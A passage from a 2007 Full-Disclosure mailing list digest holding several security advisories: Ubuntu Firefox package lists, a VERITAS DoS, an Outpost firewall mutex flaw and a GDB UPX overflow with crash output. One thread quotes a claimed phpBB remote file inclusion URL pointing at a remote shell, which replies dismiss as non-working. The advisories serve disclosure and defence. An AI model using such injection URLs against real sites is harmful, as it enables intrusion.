http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.4+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 50383850 63f8e952e1af97e395b4af2fb1317d20 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.4+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 3123186 2a4be563aa81e1f10ac1fc73a3de13d4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.4+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 90542 c4c6605d51555dd401818cdd73fe24d8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 10405658 66ea051522cd171ad55907031abf8519 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.4+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 226140 976546c5d93db6490d12ce9f406ff128 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.4+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 168508 eb7528f74d5bf609abd405701af30690 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.4+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 251184 cc33e7da81347b766681892186fbb9a1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.4+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 862468 3c01f9de6c4028b16f69aded7007e811 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.4+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 49550588 a96b2fc47e6e7b6a23c12603752d263f http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.4+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 3114268 10ec50f560e888f9703bd75156b6fee4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.4+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 84236 b8898fc67e19fa6baa45203ea8586ee2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 9229344 312be6ca5d3fc115b3daad60c32a8851 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.4+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 226134 defe99fc5f84d9d3ff699e584fb9e230 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.4+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 158112 cd18c5cd4a889331fc3cdd2c790f2f65 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.4+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 251156 85212783e2485ada218c51c5a47fe74b http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.4+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 786318 3add01c2e8b787717630dd0273f67876 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.4+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 52069432 08f2b3bd01bfe599b9ca17bd7e0b50fe http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.4+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 3120094 44223bafde87f08730a03db985dfbd09 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.4+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 86132 86886f53c4d9c2b03b14abc18e78b34e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 10070334 e6f7bb5e124a9e9f76417182c919fdf2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.4+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 226144 c626912ad23f5d26938c3e6c76b428c6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.4+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 167214 47d2b8d0ec609ddf08bcb96a6816a55a http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.4+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 251184 aa55e3a53d20693b0b2545a37352df0e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.4+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 861184 990b5fbaac27061ca02548f576059bb5 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.4+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 49596020 1b7384d74a17cc437b853c588b883648 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.4+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 3110952 556b56f1daadd38975dae7a94c9b161c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.4+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 83990 1d69cfd5daa61fb84eaa50c45dce319f http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 9497864 5539d661906e8d005f2e2ee19424035a http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.4+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 226146 bb920addaf5ad5483988629afb71707f http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.4+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 156102 6c09188800743724360a8078141b004c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.4+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 251154 32627bfd22e65009f50c211455ee8c42 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.4+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 766992 fe5c59ffeff0561d3d0daa738ce04e69 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+1-0ubuntu1.diff.gz Size/MD5: 321365 0b1238ff489f2930bdbfc881a7231752 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+1-0ubuntu1.dsc Size/MD5: 1822 5c371353afb0c3350ceb8382598418f6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+1.orig.tar.gz Size/MD5: 47491520 d6ed447e737cbb052f166513e156a8ae Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.4+1-0ubuntu1_all.deb Size/MD5: 242608 05565ed9c74bda7b4f41ce128acf9bf0 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_2.0.0.4+1-0ubuntu1_all.deb Size/MD5: 58010 1a24dcef7dc9cc4d822950d221dcd7c4 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dom-inspector_2.0.0.4+1-0ubuntu1_all.deb Size/MD5: 58104 f432e15d5aa015431625a9441cc78294 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-gnome-support_2.0.0.4+1-0ubuntu1_all.deb Size/MD5: 58114 b767adff28aa5122cb323c5fdaa84bad http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox_2.0.0.4+1-0ubuntu1_all.deb Size/MD5: 58916 d0bb411339d0a2d41c5a70ab39f6408a amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.4+1-0ubuntu1_amd64.deb Size/MD5: 50392344 137bcf1e922a9efe68a372aefa423e7e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.4+1-0ubuntu1_amd64.deb Size/MD5: 3126078 f4503c85765cce9b24fc94b577ca2f83 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.4+1-0ubuntu1_amd64.deb Size/MD5: 92506 986e1863081e668472093ae011c220ed http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.4+1-0ubuntu1_amd64.deb Size/MD5: 61802 3b8c36461fb77a3e26f6690d0395ebe4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+1-0ubuntu1_amd64.deb Size/MD5: 10423124 6ff93cdeb9b83313e2fb1f0d169d9b12 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.4+1-0ubuntu1_amd64.deb Size/MD5: 227928 9ec92d7049825f891508bf897b846288 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.4+1-0ubuntu1_amd64.deb Size/MD5: 173498 81a4287d647baca18182b5c3ea2a7b52 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.4+1-0ubuntu1_amd64.deb Size/MD5: 253138 66162c3ec394e2d69ef509d5d3dadef9 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.4+1-0ubuntu1_amd64.deb Size/MD5: 871550 e39e905df4f9baab11e9d5a6f7a3b565 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.4+1-0ubuntu1_i386.deb Size/MD5: 49548394 ef9649f02bd881b87a90001715739673 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.4+1-0ubuntu1_i386.deb Size/MD5: 3116646 83aebb511cf991cb4654f8fe0ccaaf54 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.4+1-0ubuntu1_i386.deb Size/MD5: 86122 b835b81677eb81107990de2d3cf359a4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.4+1-0ubuntu1_i386.deb Size/MD5: 61208 972228d0f8c6ad4018d07f9fdcfa83ad http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+1-0ubuntu1_i386.deb Size/MD5: 9229254 1dc5977f11f4edee93acd533bf534a11 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.4+1-0ubuntu1_i386.deb Size/MD5: 227922 96e979d0e88abbf9d686fb53d172007e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.4+1-0ubuntu1_i386.deb Size/MD5: 162402 37027cb3034de814789448a4a21f411b http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.4+1-0ubuntu1_i386.deb Size/MD5: 253114 be9f781ec25930a782870fc6eb5aa538 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.4+1-0ubuntu1_i386.deb Size/MD5: 795090 750860731b186e1edfe65cb4de0658a8 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 52047388 f3546427d9db1135e45be79894343a49 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 3128766 e0eb209394a0e712ee5d1966dc7916bc http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 90012 b94b9a09108120f270517da76ec6f389 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 62046 d36becc33de4045c2f2dbeb6c64289d1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 10300368 cc67e097f8e48deed1eaa440756015d8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 227928 8b80d9af30911ed28695a5588889b3f1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 179146 8acfc78103e2564dae308249f1c13bf4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 253134 5430ca8ed9b673502ddd785839c958d2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 880076 12176deddf234d06abeae6f70619beed sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 49581610 b95bd1d3ae9b24adbcb33cb178ebeedc http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 3116042 13c8042824328d7532c1b6c001816cb4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 85894 501ad76450f235ff737b04aa4a338075 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 61276 f08660c4ab2e519dc20906b5f9e0262e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 9508164 8912a5edd8eb95f01de39d84d32bf008 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 227930 e7a4ea59029a82024b8a44b075c5c2ad http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 161202 48756164c8a0005e5f606d2c3f99f121 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 253134 bc7ad012e4520853ba30247887e3a73d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 785742 f7bce0cd084b04fe505701ec97d17303 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070601/c954eec9/attachment.bin From labs-no-reply at idefense.com Sat Jun 2 00:59:23 2007 From: labs-no-reply at idefense.com (iDefense Labs) Date: Fri, 01 Jun 2007 19:59:23 -0400 Subject: [Full-disclosure] iDefense Security Advisory 06.01.07: Symantec VERITAS Storage Foundation Administration Service DoS Vulnerability Message-ID: <4660B2DB.2060503@idefense.com> Symantec VERITAS Storage Foundation Administration Service DoS Vulnerability iDefense Security Advisory 06.01.07 http://labs.idefense.com/intelligence/vulnerabilities/ June 01, 2007 I. BACKGROUND The VERITAS Storage Foundation is made up of the Veritas File System, Veritas Volume Replicator (VVR) products and some other utilities. It allows virtualization of storage over a variety of platforms, and contains a remote administration application to configure and monitor the elements of the storage network. More information can be found at the following URL. http://www.symantec.com/enterprise/products/overview.jsp?pcid=1020&pvid=203_1 II. DESCRIPTION Remote exploitation of an input validation vulnerability in VERITAS Software Corp.'s Storage Foundation 4.3 Enterprise Administration service could allow an unauthenticated attacker to consume excessive resources or crash the service. The vulnerability specifically exists in the handling of packets delivered to the VVR Administration service port, TCP/8199. By sending specially crafted requests to a vulnerable host, attackers are able to control the size value for memory allocation. In cases where requests are made for more memory than the system is able to allocate, the service attempts to write to an invalid pointer, which crashes the service. If allocation succeeds, the resulting memory will not be released until the connection is closed. This allows a resource consumption denial of service attack. III. ANALYSIS Successful exploitation of this vulnerability allows remote attackers to cause the affected service to terminate. As no checks are made that the values given make sense, it is possible to cause the service to allocate large amounts of memory, potentially causing severely degraded system performance and instability in other processes. Crashing the administration service, which is restarted after 60 seconds, would most likely not directly impact the operation of the replication service itself. However, it likely the resource consumption variation would prevent the affected system from being usable for the duration of the attack. IV. DETECTION iDefense Labs confirmed that VERITAS Storage Foundation for Windows version 4.3.01 is vulnerable. It is suspected that all previous versions of are vulnerable. V. WORKAROUND Applying filtering to the affected port, such that only hosts an administrator uses can access it, will help mitigate exposure to the vulnerability. VI. VENDOR RESPONSE Symantec has addressed this vulnerability with a software update. For more information consult their advisory at the following URL. http://www.symantec.com/avcenter/security/Content/2007.06.01a.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-1593 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 10/11/2006 Initial vendor notification 10/12/2006 Initial vendor response 06/01/2007 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by CIRT.DK. Additionally, iDefense Labs discovered the ability to consume excessive resources while researching this vulnerability. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From hardened-php at hushmail.com Sat Jun 2 09:14:19 2007 From: hardened-php at hushmail.com (hardened-php at hushmail.com) Date: Sat, 02 Jun 2007 04:14:19 -0400 Subject: [Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT Message-ID: <20070602081420.20350DA82A@mailserver8.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 "New bug found in phpBB, most pages vulnerable, theres more bugs, I\'ll post one a week: victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.sh ell]%00 For example: http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[rem ote.shell]%00 Enjoy :) BUG BY REZEN! XORCREW! H4X H4X!" Did you even read the code rezen? test your "vuln"? How about you test what you find instead of posting everything you see to the list and trying to get attention/fame? Leave vuln assessment/code auditing to people who actually care about it, and stop playing as one. -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkZhJdIACgkQMe2+mPigEXJ5awP+Iqd9pRIypATEnM1K7ZhpAjxPgJeY NedFd4Dkf6EgeQFy0zY2qGHM24CrbHO27bfsM2tRbUIdxUbGjD+f5pQ1hGjEF0Mg6Jw0 cBoER8jhWMiZZRxlseaKtkL7t8iF4DsZq5OIdrbHEm4oGpudHE0FKpJFyLsR8Tk85ziA Icd6qcQ= =Rhg/ -----END PGP SIGNATURE----- -- Prices, software, charts & analysis. Click here to open your online FX trading account. http://tagline.hushmail.com/fc/CAaCXv1QmGxJYt2brAIxTpm5SofhvHbE/ From research at matousec.com Fri Jun 1 18:37:01 2007 From: research at matousec.com (Matousec - Transparent security Research) Date: Fri, 01 Jun 2007 19:37:01 +0200 Subject: [Full-disclosure] Outpost Enforcing system reboot with 'outpost_ipc_hdr' mutex Vulnerability Message-ID: <4660593D.3030400@matousec.com> Hello, We would like to inform you about a vulnerability in Outpost Firewall PRO 4.0. Description: Outpost insufficiently protects its own mutex outpost_ipc_hdr. Arbitrary process is able to open and capture this mutex. In such case, Outpost is not able to use this mutex for its synchronization and its internal mechanisms lock when they try to use it. Outpost uses this mutex every time a potentially dangerous operation is executed. For example, this results in an impossibility of running new processes while the mutex is locked. After the mutex is released, all blocked operations completes. However, the release can not be enforced. User is thus forced to reboot the system. Vulnerable software: * Outpost Firewall PRO 4.0 (1007.591.145) * Outpost Firewall PRO 4.0 (964.582.059) * probably all older versions of Outpost Firewall PRO 4.0 * possibly older versions of Outpost Firewall PRO More details and a proof of concept including its source code are available here: http://www.matousec.com/info/advisories/Outpost-Enforcing-system-reboot-with-outpost_ipc_hdr-mutex.php Regards, -- Matousec - Transparent security Research http://www.matousec.com/ From neothermic at phpbb.com Fri Jun 1 23:00:09 2007 From: neothermic at phpbb.com (Ashley Pinner) Date: Fri, 01 Jun 2007 23:00:09 +0100 Subject: [Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT Message-ID: <466096E9.1000408@phpbb.com> Renzen, As has already been noted, functions_post.php has this at the top: if (!defined('IN_PHPBB')) { die('Hacking attempt'); } Accessing functions_post.php directly does not set this variable, ergo you will not be able to influence the includes below that line. This is the case with most of the files in the includes directory; any file that does not include the above lines does not have any code outside of just functions and thus you are unable to influence the variables as they would be out of scope. If you feel that you have found a vulnerability, I would encourage you to use our Security tracker to make a report, which can be found here: http://www.phpbb.com/security/ Thank you, NeoThermic Support Team member, Incident Investigation Team leader, Audit Team member. From bania.piotr at gmail.com Sun Jun 3 09:36:06 2007 From: bania.piotr at gmail.com (Piotr Bania) Date: Sun, 03 Jun 2007 10:36:06 +0200 Subject: [Full-disclosure] Disinfectors for the calculator virus (ti89.Gaara) Message-ID: <46627D76.607@gmail.com> Hey, For those who are interrested, i made two types of Gaara (the calculator virus) disinfectors. The first one patches the virus body, which causes to return the control to the host just when the EPO injection travels the control to the virus. So the virus will not get executed at all. And the second one is trying to find an EPO injection by searching for BRA opcodes, and testing them for suitable conditions. Here are the codes: Dis1: Source: http://piotrbania.com/all/ti89/dis1.c Binary: http://piotrbania.com/all/ti89/dis1.89z Dis2: Source: http://piotrbania.com/all/ti89/dis2.c Binary: http://piotrbania.com/all/ti89/dis2.89z i hope you will find them somehow interresting. best regards, pb -- -------------------------------------------------------------------- Piotr Bania - - 0xCD, 0x19 Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33 http://www.piotrbania.com - Key ID: 0xBE43AC33 -------------------------------------------------------------------- - "The more I learn about men, the more I love dogs." From xwings at security.net.my Sat Jun 2 18:48:03 2007 From: xwings at security.net.my (xWinGs) Date: Sun, 3 Jun 2007 01:48:03 +0800 Subject: [Full-disclosure] SNMY200706_01 : GBD UPX File Handling Buffer Overflow Vulnerability Message-ID: <200706030148.03485.xwings@security.net.my> Title : GBD UPX File Handling Buffer Overflow Vulnerability security.net.my Advisory: SNMY200706_01 Release Date : 2007-06-02 Last Update : 2007-06-02 Critical : Low Impact : System access Where : From Local Solution Status : None Software : GDB 6.6 and above CVE reference : None Related Files : http://blog.xwings.net/?p=71 **************************************************** ** Description : **************************************************** A vulnerability has been reported in GDB, which possible exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error in "coffread.c" when unpacking executable files compressed with UPX. This can be exploited to cause a buffer overflow and potentially allows arbitrary code execution via a specially-crafted UPX packed file. The vulnerability has been reported in versions 6.6 till the lastest CVS. **************************************************** ** Provided and/or discovered by : **************************************************** Discovered by KaiJern, Lau. (xwingssecuritynetmy) **************************************************** ** Changelog: **************************************************** 2006-01-13: Updated advisory with information from 3Com's Zero Day Initiative. 2006-01-17: Added link to US-CERT vulnerability note. **************************************************** ** Crashing GDB : **************************************************** $ file gdbupx gdbupx: MS-DOS executable PE for MS Windows (console) Intel 80386 32-bit, UPX compressed $ upx -d gdbupx Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 UPX 2.02 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 13th 2006 File size Ratio Format Name -------------------- ------ ----------- ----------- upx: gdbupx: CantUnpackException: exe header corrupte.e Unpacked 0 files. $ gdb -v GNU gdb 6.6 Copyright (C) 2006 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu". $ gdb gdbtest/bin/gdb GNU gdb 6.6 Copyright (C) 2006 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"... Using host libthread_db library "/lib/libthread_db.so.1". Really redefine built-in command "frame"? (y or n) [answered Y; input not from terminal] Really redefine built-in command "thread"? (y or n) [answered Y; input not from terminal] Really redefine built-in command "start"? (y or n) [answered Y; input not from terminal] gdb>r gdbupx GNU gdb 6.6.50.20070531-cvs Copyright (C) 2007 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"... Program received signal SIGSEGV, Segmentation fault. _______________________________________________________________________________ eax:08334F70 ebx:00000000 ecx:08337168 edx:082C3240 eflags:00210246 esi:0833D320 edi:0833D34C esp:BF8E54D0 ebp:BF8E54F8 eip:0814CD82 cs:0073 ds:007B es:007B fs:0000 gs:0033 ss:007B o d I t s Z a P c [007B:BF8E54D0]---------------------------------------------------------[stack] BF8E5500 : 80 02 00 00 00 00 00 00 - FC 01 00 00 00 00 00 00 ................ BF8E54F0 : 30 00 00 00 F0 55 8E BF - 38 56 8E BF 50 D7 14 08 0....U..8V..P... BF8E54E0 : 68 71 33 08 F4 BD 2E 08 - F0 55 8E BF 00 00 00 00 hq3......U...... BF8E54D0 : 31 2D 25 08 FF FF FF FF - F8 54 8E BF 7D C0 14 08 1-%......T..}... [007B:0833D320]---------------------------------------------------------[ data] 0833D320 : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 0833D330 : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ [0073:0814CD82]---------------------------------------------------------[ code] 0x814cd82 : movzx eax,BYTE PTR [ebx] 0x814cd85 : cmp al,BYTE PTR [edx+24] 0x814cd88 : mov BYTE PTR [esi+12],0x1 0x814cd8c : mov DWORD PTR [esp+12],ecx 0x814cd90 : sete al 0x814cd93 : movzx eax,al ------------------------------------------------------------------------------ 0x0814cd82 in process_coff_symbol (cs=0xbf8e55f0, aux=0x82ebdf4, objfile=0x8337168) at coffread.c:1482 1482 name = EXTERNAL_NAME (name, objfile->obfd); gdb>bt #0 0x0814cd82 in process_coff_symbol (cs=0xbf8e55f0, aux=0x82ebdf4, objfile=0x8337168) at coffread.c:1482 #1 0x0814d750 in coff_symfile_read (objfile=0x8337168, mainline=0x1) at coffread.c:1084 #2 0x08108ff3 in syms_from_objfile (objfile=0x8337168, addrs=0x833e280, offsets=0x0, num_offsets=0x0, mainline=0x1, verbo=0x0) at symfile.c:876 #3 0x081093de in symbol_file_add_with_addrs_or_offsets (abfd=0x8334f70, from_tty=0x0, addrs=0x0, offsets=0x0, num_offsets=0x0, mainline=0x1, flags=0x0) at symfile.c:988 #4 0x0810a265 in symbol_file_add_main_1 (args=0x8334f70 "\001", from_tty=0x82c3240, flags=) at symfile.c:1121 #5 0x08121b92 in catch_command_errors (command=0x810a3f0 , arg=0xbf8e72ad "../../gdbupx", from_tty=0x0, mask=0x6) at exceptions.c:530 #6 0x0807eb38 in captured_main (data=0xbf8e58f4) at .././gdb/main.c:728 #7 0x08121c2b in catch_errors (func=0x807e1e0 , func_args=0xbf8e58f4, errstring=0x8252d31 "", mask=0x6) at exceptions.c:515 #8 0x0807e193 in gdb_main (args=0xbf8e58f4) at .././gdb/main.c:881 #9 0x0807e155 in main (argc=0x0, argv=0x8332df0) at gdb.c:35 **************************************************** ** Thanks To : **************************************************** i. BSDaemon @ kernelhacking.com ii. RedDragon @ thc iii. Committee Members of hackinthebox.org iv. pulltheplug.org -- -- Regards, xWinGs aka KJ, Lau == All good things ... come by grace, and grace come by art, and art does not come easy. ** From : xwings (at) security (dot) net (dot) my From xwings at security.net.my Sat Jun 2 18:51:56 2007 From: xwings at security.net.my (xWinGs) Date: Sun, 3 Jun 2007 01:51:56 +0800 Subject: [Full-disclosure] RESEND new Copy : SNMY200706_01 : GBD UPX File Handling Buffer Overflow Vulnerability Message-ID: <200706030151.56513.xwings@security.net.my> Title : GBD UPX File Handling Buffer Overflow Vulnerability security.net.my Advisory: SNMY200706_01 Release Date : 2007-06-02 Last Update : 2007-06-02 Critical : Low Impact : System access Where : From Local Solution Status : None Software : GDB 6.6 and above CVE reference : None Related Files : http://blog.xwings.net/?p=71 **************************************************** ** Description : **************************************************** A vulnerability has been reported in GDB, which possible exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error in "coffread.c" when unpacking executable files compressed with UPX. This can be exploited to cause a buffer overflow and potentially allows arbitrary code execution via a specially-crafted UPX packed file. The vulnerability has been reported in versions 6.6 till the 